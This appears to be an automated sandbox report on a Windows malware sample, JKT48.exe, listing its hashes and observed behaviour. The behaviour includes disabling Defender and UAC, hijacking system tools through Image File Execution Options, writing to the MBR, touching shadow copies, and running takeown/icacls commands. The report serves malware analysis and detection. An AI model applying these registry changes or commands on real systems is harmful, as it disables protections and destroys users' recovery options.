Resubmissions
28/03/2025, 14:59
250328-sc4wsazjx2 1028/03/2025, 14:53
250328-r9rr2sxwbz 1027/03/2025, 13:35
250327-qvr9laswew 10Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27/03/2025, 13:35
Static task
static1
Behavioral task
behavioral1
Sample
JKT48.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JKT48.exe
Resource
win10v2004-20250314-en
General
-
Target
JKT48.exe
-
Size
8.0MB
-
MD5
41f5bac802f5e79dc2ca7a3db25d0001
-
SHA1
ce56c42cadd2db13edf03c15ce3b11c2cfa00f9e
-
SHA256
9b495506295d895825ddf2a45c28f704debc31f28c4943b1a78b75c898a4375d
-
SHA512
94705e83ce1b104954be07210ea3648c7403a6dd86ebaf6e884ced1552636b6a05a3b2926415d6c49ff251a675815435e4b2a3c8f816bbbf68c08c3299db99ab
-
SSDEEP
196608:PF35AX/ip4e/aS3e+gr80KILDjhoOX9oeqZ8r8swzH0e:d3KX/o4eSTr80xHhJ8s63
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" JKT48.exe -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" JKT48.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" JKT48.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 32 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe\Debugger = "*/" JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\resmon.exe JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LogonUI.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ipconfig.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe JKT48.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trustedinstaller.exe JKT48.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\windows\\system32\\wscript.exe C:\\bilauncher.vbs" JKT48.exe -
Possible privilege escalation attempt 64 IoCs
pid Process 1532 takeown.exe 600 takeown.exe 1676 Process not Found 2372 Process not Found 2828 Process not Found 1608 Process not Found 1732 Process not Found 788 Process not Found 1532 takeown.exe 2184 icacls.exe 2444 Process not Found 2636 Process not Found 2672 Process not Found 2192 Process not Found 1488 icacls.exe 896 takeown.exe 1588 Process not Found 1516 Process not Found 1400 Process not Found 2240 Process not Found 2424 Process not Found 2596 Process not Found 1520 takeown.exe 2372 takeown.exe 2672 Process not Found 1852 Process not Found 3036 Process not Found 2744 Process not Found 2724 Process not Found 2440 Process not Found 2516 icacls.exe 2832 takeown.exe 1700 Process not Found 200 Process not Found 2492 Process not Found 1360 Process not Found 1980 Process not Found 1460 Process not Found 1648 Process not Found 2036 Process not Found 780 Process not Found 3032 Process not Found 1820 Process not Found 2656 takeown.exe 692 Process not Found 1404 icacls.exe 2000 icacls.exe 228 takeown.exe 1388 takeown.exe 2412 Process not Found 1460 Process not Found 2240 Process not Found 2676 icacls.exe 484 takeown.exe 2060 takeown.exe 1568 icacls.exe 1636 Process not Found 1740 Process not Found 760 takeown.exe 2088 takeown.exe 2132 icacls.exe 2180 Process not Found 2888 Process not Found 2596 takeown.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 2544 icacls.exe 1952 takeown.exe 204 takeown.exe 1704 Process not Found 1908 Process not Found 2868 takeown.exe 1952 takeown.exe 2700 Process not Found 888 Process not Found 2372 Process not Found 948 Process not Found 2980 Process not Found 2708 Process not Found 1076 Process not Found 1292 Process not Found 1708 Process not Found 2132 Process not Found 2244 icacls.exe 2820 takeown.exe 2224 icacls.exe 1632 icacls.exe 1188 icacls.exe 2280 icacls.exe 2092 Process not Found 1912 Process not Found 484 takeown.exe 2120 takeown.exe 3016 takeown.exe 2336 takeown.exe 2180 Process not Found 2540 Process not Found 2152 Process not Found 2912 Process not Found 572 icacls.exe 2408 icacls.exe 3024 icacls.exe 1492 Process not Found 1424 Process not Found 2428 Process not Found 2332 takeown.exe 3064 Process not Found 1980 Process not Found 1952 takeown.exe 352 Process not Found 1952 Process not Found 1388 Process not Found 2636 Process not Found 1776 Process not Found 1016 takeown.exe 2900 icacls.exe 1412 Process not Found 2264 Process not Found 2056 takeown.exe 2088 icacls.exe 2600 icacls.exe 2832 Process not Found 2112 Process not Found 2456 Process not Found 1676 Process not Found 216 Process not Found 1456 takeown.exe 2812 takeown.exe 2188 Process not Found 2468 Process not Found -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 JKT48.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File created C:\windows\system32\taskmgr.exe JKT48.exe File created C:\windows\syswow64\reg.exe JKT48.exe File created C:\windows\syswow64\taskkill.exe JKT48.exe File created C:\windows\syswow64\rundll32.exe JKT48.exe File created C:\windows\syswow64\taskmgr.exe JKT48.exe File created C:\windows\syswow64\resmon.exe JKT48.exe File created C:\windows\syswow64\sethc.exe JKT48.exe File created C:\windows\system32\cmd.exe JKT48.exe File created C:\windows\system32\perfmon.msc JKT48.exe File created C:\windows\system32\logonui.exe JKT48.exe File created C:\windows\system32\winload.exe JKT48.exe File created C:\windows\syswow64\perfmon.msc JKT48.exe File created C:\windows\system32\msconfig.exe JKT48.exe File created C:\windows\system32\sethc.exe JKT48.exe File created C:\windows\system32\taskkill.exe JKT48.exe File created C:\windows\syswow64\perfmon.exe JKT48.exe File created C:\windows\system32\utilman.exe JKT48.exe File created C:\windows\system32\perfmon.exe JKT48.exe File created C:\windows\system32\sfc.exe JKT48.exe File created C:\windows\syswow64\regedit.exe JKT48.exe File created C:\windows\system32\reg.exe JKT48.exe File created C:\windows\system32\ntoskrnl.exe JKT48.exe File created C:\windows\syswow64\cmd.exe JKT48.exe File created C:\windows\syswow64\sfc.exe JKT48.exe File created C:\windows\system32\resmon.exe JKT48.exe File created C:\windows\system32\rstrui.exe JKT48.exe File created C:\windows\system32\hal.dll JKT48.exe File created C:\windows\system32\rundll32.exe JKT48.exe File created C:\windows\syswow64\utilman.exe JKT48.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\msvcp120ex.dll JKT48.exe File created C:\Program Files\Common Files\Microsoft Shared\MSInfo\msvcp120ex.dll JKT48.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\580085541 JKT48.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\RCX8DC5.tmp JKT48.exe File created C:\Program Files (x86)\Google\Update\1.3.36.151\316326468 JKT48.exe File opened for modification C:\Program Files\DVD Maker\13890929 JKT48.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\RCX7EE5.tmp JKT48.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Windows Journal\70949424 JKT48.exe File opened for modification C:\Program Files\Windows Sidebar\540415478 JKT48.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files (x86)\Google\Update\RCX2BCD.tmp JKT48.exe File created C:\Program Files\Microsoft Games\FreeCell\799812007 JKT48.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\155507725 JKT48.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Windows Sidebar\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\155507725 JKT48.exe File created C:\Program Files\7-Zip\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\560551735 JKT48.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Backgammon\114541536 JKT48.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\420550546 JKT48.exe File opened for modification C:\Program Files\Windows Journal\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\RCX2E6E.tmp JKT48.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\418067057 JKT48.exe File created C:\Program Files\Windows NT\Accessories\msvcp120ex.dll JKT48.exe File created C:\Program Files (x86)\Common Files\microsoft shared\EQUATION\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Updater6\msvcp120ex.dll JKT48.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\53853156 JKT48.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\RCX7D1F.tmp JKT48.exe File opened for modification C:\Program Files\Windows Mail\msvcp120ex.dll JKT48.exe File created C:\Program Files\Windows Sidebar\540415478 JKT48.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Windows NT\Accessories\351031254 JKT48.exe File created C:\Program Files\Java\jre7\bin\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\VideoLAN\VLC\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\DW\msvcp120ex.dll JKT48.exe File created C:\Program Files (x86)\Common Files\microsoft shared\DW\378129672 JKT48.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\RCXB2F.tmp JKT48.exe File opened for modification C:\Program Files\Microsoft Games\Chess\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\RCX7D20.tmp JKT48.exe File created C:\Program Files\Microsoft Games\Hearts\608795718 JKT48.exe File created C:\Program Files\Microsoft Games\Solitaire\418067057 JKT48.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\296506785 JKT48.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\RCX36FC.tmp JKT48.exe File created C:\Program Files\Google\Chrome\Application\834843778 JKT48.exe File created C:\Program Files\Microsoft Games\Purble Place\420550546 JKT48.exe File created C:\Program Files (x86)\Common Files\microsoft shared\DW\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\DVD Maker\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\RCX8DC4.tmp JKT48.exe File created C:\Program Files\VideoLAN\VLC\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Windows NT\Accessories\RCXD1FE.tmp JKT48.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\RCXDBF.tmp JKT48.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Microsoft Games\Minesweeper\RCX8233.tmp JKT48.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\msvcp120ex.dll JKT48.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\RCX8A86.tmp JKT48.exe File created C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\msvcp120ex.dll JKT48.exe File created C:\Program Files (x86)\Google\Update\157493115 JKT48.exe File opened for modification C:\Program Files\Google\Chrome\Application\RCX50C8.tmp JKT48.exe File opened for modification C:\Program Files\Microsoft Games\Minesweeper\RCX8234.tmp JKT48.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\windows\servicing\trustedinstaller.exe JKT48.exe File created C:\windows\regedit.exe JKT48.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1664 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2644 JKT48.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2644 JKT48.exe Token: SeDebugPrivilege 2644 JKT48.exe Token: SeIncBasePriorityPrivilege 2644 JKT48.exe Token: SeTakeOwnershipPrivilege 332 takeown.exe Token: SeTakeOwnershipPrivilege 1972 takeown.exe Token: SeTakeOwnershipPrivilege 952 takeown.exe Token: SeTakeOwnershipPrivilege 2012 takeown.exe Token: SeTakeOwnershipPrivilege 2700 takeown.exe Token: SeTakeOwnershipPrivilege 1652 takeown.exe Token: SeTakeOwnershipPrivilege 2116 takeown.exe Token: SeTakeOwnershipPrivilege 692 takeown.exe Token: SeTakeOwnershipPrivilege 1900 takeown.exe Token: SeTakeOwnershipPrivilege 2804 takeown.exe Token: SeTakeOwnershipPrivilege 2852 takeown.exe Token: SeTakeOwnershipPrivilege 2276 takeown.exe Token: SeTakeOwnershipPrivilege 2912 takeown.exe Token: SeTakeOwnershipPrivilege 2820 takeown.exe Token: SeTakeOwnershipPrivilege 484 takeown.exe Token: SeTakeOwnershipPrivilege 1668 takeown.exe Token: SeTakeOwnershipPrivilege 1988 takeown.exe Token: SeTakeOwnershipPrivilege 1884 takeown.exe Token: SeTakeOwnershipPrivilege 2484 takeown.exe Token: SeTakeOwnershipPrivilege 788 takeown.exe Token: SeTakeOwnershipPrivilege 1456 takeown.exe Token: SeTakeOwnershipPrivilege 752 takeown.exe Token: SeTakeOwnershipPrivilege 2456 takeown.exe Token: SeTakeOwnershipPrivilege 1188 takeown.exe Token: SeTakeOwnershipPrivilege 1420 takeown.exe Token: SeTakeOwnershipPrivilege 2784 takeown.exe Token: SeTakeOwnershipPrivilege 2568 takeown.exe Token: SeTakeOwnershipPrivilege 2680 takeown.exe Token: SeTakeOwnershipPrivilege 2612 takeown.exe Token: SeTakeOwnershipPrivilege 1408 takeown.exe Token: SeTakeOwnershipPrivilege 1828 takeown.exe Token: SeTakeOwnershipPrivilege 780 takeown.exe Token: SeTakeOwnershipPrivilege 2888 takeown.exe Token: SeTakeOwnershipPrivilege 804 takeown.exe Token: SeTakeOwnershipPrivilege 2188 takeown.exe Token: SeTakeOwnershipPrivilege 1476 takeown.exe Token: SeTakeOwnershipPrivilege 2528 takeown.exe Token: SeTakeOwnershipPrivilege 332 takeown.exe Token: SeTakeOwnershipPrivilege 1700 takeown.exe Token: SeTakeOwnershipPrivilege 1016 takeown.exe Token: SeTakeOwnershipPrivilege 1772 takeown.exe Token: SeTakeOwnershipPrivilege 2948 takeown.exe Token: SeTakeOwnershipPrivilege 1360 takeown.exe Token: SeTakeOwnershipPrivilege 2920 takeown.exe Token: SeTakeOwnershipPrivilege 2676 takeown.exe Token: SeTakeOwnershipPrivilege 600 takeown.exe Token: SeTakeOwnershipPrivilege 1400 takeown.exe Token: SeTakeOwnershipPrivilege 1624 takeown.exe Token: SeTakeOwnershipPrivilege 2828 takeown.exe Token: SeTakeOwnershipPrivilege 2776 takeown.exe Token: SeTakeOwnershipPrivilege 2820 takeown.exe Token: SeTakeOwnershipPrivilege 1716 takeown.exe Token: SeTakeOwnershipPrivilege 3000 takeown.exe Token: SeTakeOwnershipPrivilege 908 takeown.exe Token: SeTakeOwnershipPrivilege 2580 takeown.exe Token: SeTakeOwnershipPrivilege 1860 takeown.exe Token: SeTakeOwnershipPrivilege 2856 takeown.exe Token: SeTakeOwnershipPrivilege 3016 takeown.exe Token: SeTakeOwnershipPrivilege 1632 takeown.exe Token: SeTakeOwnershipPrivilege 2960 takeown.exe Token: SeTakeOwnershipPrivilege 2796 takeown.exe -
Suspicious use of SetWindowsHookEx 13 IoCs
pid Process 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe 2644 JKT48.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2644 wrote to memory of 2776 2644 JKT48.exe 30 PID 2644 wrote to memory of 2776 2644 JKT48.exe 30 PID 2644 wrote to memory of 2776 2644 JKT48.exe 30 PID 2644 wrote to memory of 2704 2644 JKT48.exe 32 PID 2644 wrote to memory of 2704 2644 JKT48.exe 32 PID 2644 wrote to memory of 2704 2644 JKT48.exe 32 PID 2644 wrote to memory of 2752 2644 JKT48.exe 34 PID 2644 wrote to memory of 2752 2644 JKT48.exe 34 PID 2644 wrote to memory of 2752 2644 JKT48.exe 34 PID 2644 wrote to memory of 2592 2644 JKT48.exe 36 PID 2644 wrote to memory of 2592 2644 JKT48.exe 36 PID 2644 wrote to memory of 2592 2644 JKT48.exe 36 PID 2644 wrote to memory of 2560 2644 JKT48.exe 38 PID 2644 wrote to memory of 2560 2644 JKT48.exe 38 PID 2644 wrote to memory of 2560 2644 JKT48.exe 38 PID 2644 wrote to memory of 780 2644 JKT48.exe 40 PID 2644 wrote to memory of 780 2644 JKT48.exe 40 PID 2644 wrote to memory of 780 2644 JKT48.exe 40 PID 2644 wrote to memory of 2096 2644 JKT48.exe 42 PID 2644 wrote to memory of 2096 2644 JKT48.exe 42 PID 2644 wrote to memory of 2096 2644 JKT48.exe 42 PID 2644 wrote to memory of 348 2644 JKT48.exe 44 PID 2644 wrote to memory of 348 2644 JKT48.exe 44 PID 2644 wrote to memory of 348 2644 JKT48.exe 44 PID 2644 wrote to memory of 1104 2644 JKT48.exe 46 PID 2644 wrote to memory of 1104 2644 JKT48.exe 46 PID 2644 wrote to memory of 1104 2644 JKT48.exe 46 PID 2644 wrote to memory of 3028 2644 JKT48.exe 48 PID 2644 wrote to memory of 3028 2644 JKT48.exe 48 PID 2644 wrote to memory of 3028 2644 JKT48.exe 48 PID 2644 wrote to memory of 2144 2644 JKT48.exe 50 PID 2644 wrote to memory of 2144 2644 JKT48.exe 50 PID 2644 wrote to memory of 2144 2644 JKT48.exe 50 PID 2644 wrote to memory of 332 2644 JKT48.exe 52 PID 2644 wrote to memory of 332 2644 JKT48.exe 52 PID 2644 wrote to memory of 332 2644 JKT48.exe 52 PID 2644 wrote to memory of 2092 2644 JKT48.exe 54 PID 2644 wrote to memory of 2092 2644 JKT48.exe 54 PID 2644 wrote to memory of 2092 2644 JKT48.exe 54 PID 2644 wrote to memory of 2344 2644 JKT48.exe 56 PID 2644 wrote to memory of 2344 2644 JKT48.exe 56 PID 2644 wrote to memory of 2344 2644 JKT48.exe 56 PID 2644 wrote to memory of 1232 2644 JKT48.exe 58 PID 2644 wrote to memory of 1232 2644 JKT48.exe 58 PID 2644 wrote to memory of 1232 2644 JKT48.exe 58 PID 2644 wrote to memory of 2528 2644 JKT48.exe 60 PID 2644 wrote to memory of 2528 2644 JKT48.exe 60 PID 2644 wrote to memory of 2528 2644 JKT48.exe 60 PID 2644 wrote to memory of 2640 2644 JKT48.exe 62 PID 2644 wrote to memory of 2640 2644 JKT48.exe 62 PID 2644 wrote to memory of 2640 2644 JKT48.exe 62 PID 2644 wrote to memory of 1464 2644 JKT48.exe 64 PID 2644 wrote to memory of 1464 2644 JKT48.exe 64 PID 2644 wrote to memory of 1464 2644 JKT48.exe 64 PID 2644 wrote to memory of 1972 2644 JKT48.exe 66 PID 2644 wrote to memory of 1972 2644 JKT48.exe 66 PID 2644 wrote to memory of 1972 2644 JKT48.exe 66 PID 2644 wrote to memory of 2184 2644 JKT48.exe 68 PID 2644 wrote to memory of 2184 2644 JKT48.exe 68 PID 2644 wrote to memory of 2184 2644 JKT48.exe 68 PID 2644 wrote to memory of 2244 2644 JKT48.exe 70 PID 2644 wrote to memory of 2244 2644 JKT48.exe 70 PID 2644 wrote to memory of 2244 2644 JKT48.exe 70 PID 2644 wrote to memory of 2932 2644 JKT48.exe 72 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" JKT48.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JKT48.exe"C:\Users\Admin\AppData\Local\Temp\JKT48.exe"1⤵
- Modifies Windows Defender DisableAntiSpyware settings
- UAC bypass
- Disables RegEdit via registry modification
- Event Triggered Execution: Image File Execution Options Injection
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2644 -
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin" /a2⤵PID:2776
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\$Recycle.Bin" /grant Administrators:F2⤵PID:2704
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\$Recycle.Bin\S-1-5-21-3063565911-2056067323-3330884624-1000" /a2⤵PID:2752
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\$Recycle.Bin\S-1-5-21-3063565911-2056067323-3330884624-1000" /grant Administrators:F2⤵PID:2592
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Documents and Settings" /a2⤵PID:2560
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Documents and Settings" /grant Administrators:F2⤵PID:780
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache" /a2⤵PID:2096
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache" /grant Administrators:F2⤵PID:348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users" /a2⤵PID:1104
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users" /grant Administrators:F2⤵PID:3028
-
-
